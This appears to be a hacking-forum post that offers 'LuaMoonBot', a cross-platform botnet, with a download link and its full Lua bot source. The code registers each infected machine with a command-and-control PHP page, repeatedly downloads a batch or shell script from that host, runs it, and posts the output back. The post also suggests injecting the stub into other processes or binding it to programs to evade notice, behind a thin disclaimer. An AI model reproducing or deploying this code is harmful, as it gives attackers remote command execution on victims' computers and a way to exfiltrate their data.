I take no credit for this software!
LuaMoonBot is a open source botnet I developed in lua the entire bot is a single lua file that adapts itself upon execution if the system is on windows/linux/mac.
The lua botnet can be compiled on any OS windows-mac-linux as the builder can be run from wine. The actual target bot stub can also be compiled to any OS binary.
The website control point allows you to send batch code and bash shell code to target systems and read the output of the commands ran.
NOTE - this botnet does not have ANY persistance. It does not add itself to startup or registry its suggested to inject your target stub into another proccess on the system or bind the stub to another program
Virus Scan -
https://www.virustotal.com/en/file/4fae0.../analysis/
Download -
http://tmp.www.cryptixhacking.com/LuaMoonBot.zip
Lua Source Code -
Replace -
MYWEBSITE.com/lbot
with your uploaded php file directory.
I can not be held liable or responsible for how this program and its source is used. It was created and intended to allow remote computer control of other systems that have granted such access to you for control.
LuaMoonBot is a open source botnet I developed in lua the entire bot is a single lua file that adapts itself upon execution if the system is on windows/linux/mac.
The lua botnet can be compiled on any OS windows-mac-linux as the builder can be run from wine. The actual target bot stub can also be compiled to any OS binary.
The website control point allows you to send batch code and bash shell code to target systems and read the output of the commands ran.
NOTE - this botnet does not have ANY persistance. It does not add itself to startup or registry its suggested to inject your target stub into another proccess on the system or bind the stub to another program
Virus Scan -
https://www.virustotal.com/en/file/4fae0.../analysis/
Download -
http://tmp.www.cryptixhacking.com/LuaMoonBot.zip
Lua Source Code -
Replace -
MYWEBSITE.com/lbot
with your uploaded php file directory.
Code:
-- generate random ID and get current working folder yay
rr = math.randomseed(os.time())
id = math.random()
nid = string.gsub(id, "0.", "", 1)
hostname = murgaLua.getHostOsName()
CurDir = murgaLua_ExePath
Wdir = lfs.currentdir()
nid = string.gsub(id, "0.", "", 1)
-- this section detects if user ran file before and already has a ID if not makes one
if hostname=="windows" then
myID=io.open(Wdir.."\\ID.txt", "r")
else
myID=io.open(Wdir.."//ID.txt", "r")
end
if myID==nil then
newuser=true
if hostname=="windows" then
IDfile = io.open(Wdir.."\\ID.txt", "w")
else
IDfile = io.open(Wdir.."//ID.txt", "w")
end
IDfile:write(nid)
IDfile:flush()
IDfile:close()
UID = nid
else
newuser=false
if hostname=="windows" then
pID=io.open(Wdir.."\\ID.txt", "r")
else
pID=io.open(Wdir.."//ID.txt", "r")
end
pV = pID:read()
UID = pV
end
-- this is requirments for socket connection
http = require("socket.http")
ltn12 = require("ltn12")
url = require("socket.url")
-- function for sleep
function wait(waitTime)
timer = os.time()
repeat until os.time() > timer + waitTime
end
-- here if the user is new they post there ID to the php if not we get commands
if newuser==true then
local post = "InputID=" .. nid
post = post .. "&InputPCtype=" .. hostname
local response = {}local r, c, h = http.request { url = "http://www.MYWEBSITE.com/lbot/lbot.php?", method = "POST", headers = { ["content-length"] = #post, ["Content-Type"] = "application/x-www-form-urlencoded" }, source = ltn12.source.string(post), sink = ltn12.sink.table(response)}
print("UserID",UID)
print("CurDir - ",Wdir)
print("Computer",hostname)
print(response[1])
end
if newuser==false then
while( true )
do
print("UserID",UID)
print("You are not a new user")
if hostname=="windows" then
Dfile = ltn12.sink.file(io.open(Wdir.."\\cmd.bat", 'w'))
else
Dfile = ltn12.sink.file(io.open(Wdir.."//cmd.sh", 'w'))
end
http.request {
url = 'http://www.MYWEBSITE.com/lbot/'..UID..'/cmd.txt',
sink = Dfile,
}
if hostname=="windows" then
dcmd=io.popen(Wdir.."\\cmd.bat")
else
trun=io.popen("chmod 777 "..Wdir.."//cmd.sh")
trun:close()
trun=io.popen("dos2unix "..Wdir.."//cmd.sh")
trun:close()
dcmd=io.popen(Wdir.."//cmd.sh")
end
local rresult = dcmd:read("*a")
dcmd:close()
local post = "InputID=" .. UID
post = post .. "&InputCMD=" .. rresult
local response = {}local r, c, h = http.request { url = "http://www.MYWEBSITE.com/lbot/pbot.php?", method = "POST", headers = { ["content-length"] = #post, ["Content-Type"] = "application/x-www-form-urlencoded" }, source = ltn12.source.string(post), sink = ltn12.sink.table(response)}
print(response[1])
wait(20)
end
end
I can not be held liable or responsible for how this program and its source is used. It was created and intended to allow remote computer control of other systems that have granted such access to you for control.